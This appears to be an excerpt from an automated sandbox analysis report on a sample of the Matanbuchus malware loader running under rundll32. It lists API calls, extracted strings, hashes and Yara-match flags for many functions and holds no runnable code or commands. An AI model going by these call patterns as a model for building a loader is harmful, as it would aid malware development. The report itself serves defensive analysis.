                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CountCreateOpenTickwsprintf
                          • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                          • API String ID: 730945307-550109914
                          • Opcode ID: 897ebb975e1c8a78e0ea5aa10bf1b2edbdc79dace1aaba857d64415da6d47152
                          • Instruction ID: e29ed6cfc6c861e1640f38930e5ef4796f11f0aca09fe2eb28800530a8081a5a
                          • Opcode Fuzzy Hash: 897ebb975e1c8a78e0ea5aa10bf1b2edbdc79dace1aaba857d64415da6d47152
                          • Instruction Fuzzy Hash: 08316B76A00218BADB11DBA5CC4AFEFBF7DEF09394F000465FA05A6054D738AB55DBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$M_plus.e <= kGamma$M_plus.e >= kAlpha$d$d$d <= 9$p1 > 0$p2 <= (std::numeric_limits<std::uint64_t>::max)() / 10$p2 > delta
                          • API String ID: 0-2564281896
                          • Opcode ID: 678a95f5e8ad3ff43c4ae3a5cef8092bbb44476d139a0abcb852f72205ef714e
                          • Instruction ID: d6c74e5d9b27246b9c459e9c97811de084e8beb21110fcfa1cad1a8280eb3cfc
                          • Opcode Fuzzy Hash: 678a95f5e8ad3ff43c4ae3a5cef8092bbb44476d139a0abcb852f72205ef714e
                          • Instruction Fuzzy Hash: E4F11C75E04208EFDB04CF98D981ADDBBB6FF48304F108259E915AB358D739AA85CF50
                          APIs
                          • GetCurrentProcess.KERNEL32(?), ref: 7FABBDA9
                          • IsWow64Process.KERNEL32(00000000), ref: 7FABBDB0
                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7FABBDEC
                          • wsprintfW.USER32 ref: 7FABBE7A
                          • CloseHandle.KERNEL32(00000000), ref: 7FABC005
                          • CloseHandle.KERNEL32(00000000), ref: 7FABC010
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                          • String ID: 0x%x$?
                          • API String ID: 3386633596-4137330559
                          • Opcode ID: 60b80524ba72b0d9739fda438ea73451c9c87c9b288cbc19cc42c9fece31226f
                          • Instruction ID: 32a46db83de215922cf5b3f92096694d74191df35d7f4ade5da248fbdd08ff09
                          • Opcode Fuzzy Hash: 60b80524ba72b0d9739fda438ea73451c9c87c9b288cbc19cc42c9fece31226f
                          • Instruction Fuzzy Hash: 32810EB2D00218BFEF119BA5CE85EEEB7BDEF08245F140069E905E6154EA3DDE508B74
                          APIs
                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7FADCBBF), ref: 7FADD26C
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer
                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                          • API String ID: 3527080286-3064271455
                          • Opcode ID: b16154c8e0bcc9a232bb4d821c7b05b02245854f5ace9ec23e5b534293c8b4a9
                          • Instruction ID: b6cf39d8614f1c696da55a4d8afd729f0d31d9c20279c646c163ee30b4548dd6
                          • Opcode Fuzzy Hash: b16154c8e0bcc9a232bb4d821c7b05b02245854f5ace9ec23e5b534293c8b4a9
                          • Instruction Fuzzy Hash: 715167B990460ACBCF019F6AE8485EDBF78FF4D310F514195E492AB25CCB7CA622CB54
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 7FAC0F30
                          • ___TypeMatch.LIBVCRUNTIME ref: 7FAC103E
                          • _UnwindNestedFrames.LIBCMT ref: 7FAC1190
                          • CallUnexpected.LIBVCRUNTIME ref: 7FAC11AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 2751267872-393685449
                          • Opcode ID: 8ce92c2236473f36e6f9ee57da6fe3feb031fa2a7cad4bf3170b2ddbe94c7926
                          • Instruction ID: ea96542033967c363bf5c811161162a3ea7bd01434633237ee1f1e30d16bccf3
                          • Opcode Fuzzy Hash: 8ce92c2236473f36e6f9ee57da6fe3feb031fa2a7cad4bf3170b2ddbe94c7926
                          • Instruction Fuzzy Hash: 37B15E75A00309DFCF06CFA4C98099EB7B6FF08720F118569E816AB219D73DEA51CB91
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6CC784B7
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6CC784BF
                          • _ValidateLocalCookies.LIBCMT ref: 6CC78548
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6CC78573
                          • _ValidateLocalCookies.LIBCMT ref: 6CC785C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398238814.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000005.00000002.3398193086.000000006CC50000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000005.00000002.3398328752.000000006CC83000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000005.00000002.3398388420.000000006CC91000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000005.00000002.3398570094.000000006D0F9000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000005.00000002.3398622094.000000006D0FB000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 1170836740-3733052814
                          • Opcode ID: f1c352e5cf00f87b656aeada9664054c4056c662b92bdc2c6e5df2a5884829fd
                          • Instruction ID: 7bf1b60ee428c11b7d7ca26777f0b1d7c8fb92b9989f59cab5eb6a6dea422a97
                          • Opcode Fuzzy Hash: f1c352e5cf00f87b656aeada9664054c4056c662b92bdc2c6e5df2a5884829fd
                          • Instruction Fuzzy Hash: 51516B34A01204EFDF60CF69C844E9E7BB5FF45328F14819AD9246BB91E731DA15CBA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: S$lqmqxj3IPM1//0.$w$}
                          • API String ID: 0-71832097
                          • Opcode ID: 957c71df0185b46cbccc1a5871f2d2e30d694ca34853203e16461f4a9d9e6817
                          • Instruction ID: 8217ea8c3c02f2753579182d3390d24a7493a1d6f6a40c79854a1064fe2b3159
                          • Opcode Fuzzy Hash: 957c71df0185b46cbccc1a5871f2d2e30d694ca34853203e16461f4a9d9e6817
                          • Instruction Fuzzy Hash: C7B14574D04288DFEB02CFA8C944BDDBBB1AF49304F104159E949BB385D7B96A45CB61
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 7FAC0877
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 7FAC087F
                          • _ValidateLocalCookies.LIBCMT ref: 7FAC0908
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 7FAC0933
                          • _ValidateLocalCookies.LIBCMT ref: 7FAC0988
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: aaa3c111af9c546077567ea1fd63385574956772529a4b744ef81b55f11598ef
                          • Instruction ID: 0a90bde40bf97e18da8124e2c2d1139825d6ea48fb07ef3a05c300865574768d
                          • Opcode Fuzzy Hash: aaa3c111af9c546077567ea1fd63385574956772529a4b744ef81b55f11598ef
                          • Instruction Fuzzy Hash: 31418238A003099BCF00DF69C980B9EBBB5EF49324F14C165E8169B369D739EA15CB91
                          APIs
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB13FF
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB1419
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB1433
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB144D
                          Strings
                          • false, xrefs: 7FAB146E
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7FAB1469
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::bad_exception::bad_exception
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                          • API String ID: 2160870905-4036550669
                          • Opcode ID: b5a04ac64e25cc72c6dc34de74172324e0ff50c3e19b06081c2223187ce40b1b
                          • Instruction ID: baf51acb1cbff99879fc6e986e726c6cbdbea36e5e558664dfcd9844a34fdcb3
                          • Opcode Fuzzy Hash: b5a04ac64e25cc72c6dc34de74172324e0ff50c3e19b06081c2223187ce40b1b
                          • Instruction Fuzzy Hash: AF21A0B1A00308ABCB08CFA4C990DDE77BAFB94300F10859CE9416B258DF39FA45CB21
                          APIs
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB12DF
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB12F9
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB1313
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7FAB132D
                          Strings
                          • false, xrefs: 7FAB134E
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7FAB1349
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::bad_exception::bad_exception
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                          • API String ID: 2160870905-4036550669
                          • Opcode ID: c66b4379b93da53f70ac07d4ab26627b15eb3a5dbc4173d195878003a1647678
                          • Instruction ID: 2f58aef7b6e09ca5cec6bd28a5b61823218ab222517518daf00bf15a2bba6184
                          • Opcode Fuzzy Hash: c66b4379b93da53f70ac07d4ab26627b15eb3a5dbc4173d195878003a1647678
                          • Instruction Fuzzy Hash: 57217E71A00308ABCB04DFA4D990DDE73BABB95300F14859CE9516B658EF39BA55CB21
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,7FAD0DA9,7FACDD78,0000000C,7FAE2040,00000000,00000000,?,7FAD0FF6,00000021,FlsSetValue,7FAEA8C0,7FAEA8C8,7FAE2040), ref: 7FAD0D5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: 693dd47df731cd375f6a439fd28b61f4ea29e27508a46c9a9b6d6f3865344055
                          • Instruction ID: 1a6afdff6504bf7c31d0b789cbc18d69759e9cb79a24b2d223e47d7c8bb1c648
                          • Opcode Fuzzy Hash: 693dd47df731cd375f6a439fd28b61f4ea29e27508a46c9a9b6d6f3865344055
                          • Instruction Fuzzy Hash: BC21923AA01311ABD7129675DC41B8A37B8EF45770F248131F956AB28CD638F911C7D0
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7FABD185
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7FABD1F0
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7FABD20D
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7FABD24C
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7FABD2AB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7FABD2CE
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiStringWide
                          • String ID:
                          • API String ID: 2829165498-0
                          • Opcode ID: 18156609b83d1df8ec614d359643d3ac70aa51c2ad8f332116d565f167e9221d
                          • Instruction ID: f1c7209059c2324c04e650fc9621c296bde35b393db49261e7b7730a12f1c29f
                          • Opcode Fuzzy Hash: 18156609b83d1df8ec614d359643d3ac70aa51c2ad8f332116d565f167e9221d
                          • Instruction Fuzzy Hash: 7951AB7660034AAFEB119EA1DD45FEB3BBDEF48650F104128F906A6198D73CE811CB90
                          APIs
                          • GetLastError.KERNEL32(00000001,?,7FAC09C2,7FABD53B,7FABDA30,?,7FABDC68,?,00000001,?,?,00000001,?,7FAF2608,0000000C,7FABDD61), ref: 7FAC0AB1
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7FAC0ABF
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7FAC0AD8
                          • SetLastError.KERNEL32(00000000,7FABDC68,?,00000001,?,?,00000001,?,7FAF2608,0000000C,7FABDD61,?,00000001,?), ref: 7FAC0B2A
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: dcf5ebc6a488a05e9d0a48b570056143b81c36d2f73dc045066281fb7b0c3655
                          • Instruction ID: 0358c727ca9c2aa48b271cd4e32094215aff994204699c9a11b9e35250891a56
                          • Opcode Fuzzy Hash: dcf5ebc6a488a05e9d0a48b570056143b81c36d2f73dc045066281fb7b0c3655
                          • Instruction Fuzzy Hash: F801283B31C3159ED70517B6AD84A4A2BD4EF056747344339F521DA0E8EF19DC11D284
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7FACBED5
                          • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7FACBEE7
                          • swprintf.LIBCMT ref: 7FACBF08
                          • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7FACBF45
                          Strings
                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7FACBEFD
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleFileHandleTypeWriteswprintf
                          • String ID: Assertion failed: %Ts, file %Ts, line %d
                          • API String ID: 2943507729-1719349581
                          • Opcode ID: be4af9f9eee83afc8a51db778a3a303c726a8aa27ad95dc8f0ea782ab8871603
                          • Instruction ID: 5095bdddfde37af7afaf692e834bd623d9f04ea1968c165249e87022dd37b454
                          • Opcode Fuzzy Hash: be4af9f9eee83afc8a51db778a3a303c726a8aa27ad95dc8f0ea782ab8871603
                          • Instruction Fuzzy Hash: 0911387A5002186BCF10DF29CD44ADE73BCEF44260F504598EA1E97248EA34EA06CFA0
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,177197C3,7FAE2040,?,00000000,7FAE0873,000000FF,?,7FACD3EA,7D83FC4D,?,7FACD3BE,7FAE2040), ref: 7FACD48F
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7FACD4A1
                          • FreeLibrary.KERNEL32(00000000,?,00000000,7FAE0873,000000FF,?,7FACD3EA,7D83FC4D,?,7FACD3BE,7FAE2040), ref: 7FACD4C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: b7918a829aac2d719edc4bc62257db862b3dcffdeb13ab29d404a0dccbb8a3c9
                          • Instruction ID: 96591b0f73c853b18f0f3f6a3d9c406ee779dc728c4c63a245992931b4a52703
                          • Opcode Fuzzy Hash: b7918a829aac2d719edc4bc62257db862b3dcffdeb13ab29d404a0dccbb8a3c9
                          • Instruction Fuzzy Hash: 5C01A73A904615EFDB019B51CC06FEE7BBCFB08721F044225EC23A2294DB7CA610CB90
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FA75C07
                          • int.LIBCPMTD ref: 7FA75C20
                            • Part of subcall function 7FA7AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7FA7AD26
                            • Part of subcall function 7FA7AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7FA7AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7FA75C67
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7FA75CFB
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: c2a368add31695fdc70bfd6f3a78850ffbe01f0e08d04377490d003872aeffb9
                          • Instruction ID: 485f74f6406186cadd2d00e815d4af45a2df1149a28c7bbdf5198fbb3902301b
                          • Opcode Fuzzy Hash: c2a368add31695fdc70bfd6f3a78850ffbe01f0e08d04377490d003872aeffb9
                          • Instruction Fuzzy Hash: BE41B6B5D00609DFCB04CF98D990BEEBBB5FF48310F204229E815A7394DB786A41CBA1
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FA75AC7
                          • int.LIBCPMTD ref: 7FA75AE0
                            • Part of subcall function 7FA7AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7FA7AD26
                            • Part of subcall function 7FA7AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7FA7AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7FA75B27
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7FA75BBB
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: 76d3c1c3e66e60cb8f66ab233b204ab69a5b5f07503f4d9159fec793ac2bb12c
                          • Instruction ID: 61a94ca453ffdc4534e138265ff731351918c05b7800c179d81906a24a2570fd
                          • Opcode Fuzzy Hash: 76d3c1c3e66e60cb8f66ab233b204ab69a5b5f07503f4d9159fec793ac2bb12c
                          • Instruction Fuzzy Hash: D34198B4D00619DFCB05CF94D990AEEBBB5FF48310F204659E815A7394DB38AA45CBA1
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FA75987
                          • int.LIBCPMTD ref: 7FA759A0
                            • Part of subcall function 7FA7AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7FA7AD26
                            • Part of subcall function 7FA7AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7FA7AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7FA759E7
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7FA75A7B
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: 117030fa30a3fcc9c4f7d309364c085a250fc6c71a1cf4406d82870e5dc127f2
                          • Instruction ID: 66d47ce1da63f6ecafdcd6f4d22cfacb26cd6fa7a7d8d374e28ddf0fd17e9187
                          • Opcode Fuzzy Hash: 117030fa30a3fcc9c4f7d309364c085a250fc6c71a1cf4406d82870e5dc127f2
                          • Instruction Fuzzy Hash: 0541B8B5D00609DFCB04CF94D990AEEBBB5FF48310F208229E815A7394DB386A45CFA1
                          APIs
                          • __EH_prolog3.LIBCMT ref: 7FABCA0B
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FABCA16
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7FABCA84
                            • Part of subcall function 7FABCB67: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7FABCB7F
                          • std::locale::_Setgloballocale.LIBCPMT ref: 7FABCA31
                          • _Yarn.LIBCPMT ref: 7FABCA47
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 1088826258-0
                          • Opcode ID: 6a11ccbcb62a8b1aa281ece54735003f4e3706d6a8608c644361e73127058e88
                          • Instruction ID: c3e7b5d87a148cae3101b6d5d22033cf25e5df344066845a17d8d9873f933232
                          • Opcode Fuzzy Hash: 6a11ccbcb62a8b1aa281ece54735003f4e3706d6a8608c644361e73127058e88
                          • Instruction Fuzzy Hash: FE017579A003119BC706DB21D554D7D7B79FF94660B24400DD81257398CF3CAA52CBD5
                          APIs
                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 7FABC055
                          • CloseHandle.KERNEL32(?), ref: 7FABC0FF
                          • CloseHandle.KERNEL32(00000000), ref: 7FABC109
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateProcess
                          • String ID: ?
                          • API String ID: 2922976086-1684325040
                          • Opcode ID: 08d2d17dfa09d93ce1da23c4097437370361046b70d5c4297445237405be054a
                          • Instruction ID: 9421de483e90af778d557a795b3a4a37b251947900231c29caaca4e379b6f3c0
                          • Opcode Fuzzy Hash: 08d2d17dfa09d93ce1da23c4097437370361046b70d5c4297445237405be054a
                          • Instruction Fuzzy Hash: A9218071900259BBDF218AA6DD09EEF7BBDEF88700F10406DF915B1064EB3D9A54CA60
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,7FAC1BA3,00000000,?,00000001,?,?,?,7FAC1C92,00000001,FlsFree,7FAE7E5C,FlsFree), ref: 7FAC1BFF
                          • GetLastError.KERNEL32(?,7FAC1BA3,00000000,?,00000001,?,?,?,7FAC1C92,00000001,FlsFree,7FAE7E5C,FlsFree,00000000,?,7FAC0BAF), ref: 7FAC1C09
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 7FAC1C31
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          • Opcode ID: 561dfb23e5ea9fdc5c7246a17bc57cf2609012b737ff0195a842d668445239a4
                          • Instruction ID: 1e3bb0e455294433d33dc3a7b598eb9d4cd4328ed49170145c18a3ebe4b20274
                          • Opcode Fuzzy Hash: 561dfb23e5ea9fdc5c7246a17bc57cf2609012b737ff0195a842d668445239a4
                          • Instruction Fuzzy Hash: 51E01235348308B7EB111F61DD06B893B69AB10764F644430FE4DA80D4D76EE521D684
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7FABC377,?,?,?,7FABBBCC,?,0000000F,?,00000000,00000208), ref: 7FABC5A6
                          • GetProcAddress.KERNEL32(00000000), ref: 7FABC5AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: RtlRandomEx$ntdll.dll
                          • API String ID: 1646373207-4284430886
                          • Opcode ID: 10917da521ae20bc6f37d8c8aeac0d09074b42fbf2c0db30ea038dcfbb14ccec
                          • Instruction ID: 1497013ea7ed86f5717cd26aa1e4581fe92dd4a4f6c3089af473dc745e8eb54e
                          • Opcode Fuzzy Hash: 10917da521ae20bc6f37d8c8aeac0d09074b42fbf2c0db30ea038dcfbb14ccec
                          • Instruction Fuzzy Hash: 24D05E7A2282049B86006FBAC845E853BACA6086213141020FC0489245D729E6218B60
                          APIs
                          • GetConsoleOutputCP.KERNEL32(177197C3,?,00000000,?), ref: 7FAD8454
                            • Part of subcall function 7FAD439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7FAD4226,?,00000000,-00000008), ref: 7FAD4449
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 7FAD86AF
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 7FAD86F7
                          • GetLastError.KERNEL32 ref: 7FAD879A
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: b447b9cfa3812d1653f88dac241016c23334cb1f9b9a1a044cf0486e69a26d98
                          • Instruction ID: 0fe9ed2ffc18e182065cb8bbfaae5da8262eef42891c3e871d8e74a3662679df
                          • Opcode Fuzzy Hash: b447b9cfa3812d1653f88dac241016c23334cb1f9b9a1a044cf0486e69a26d98
                          • Instruction Fuzzy Hash: 8BD16DB9D002589FCF01CFA9C980AEDBBB9FF49310F14456AE856EB359D734A942CB50
                          APIs
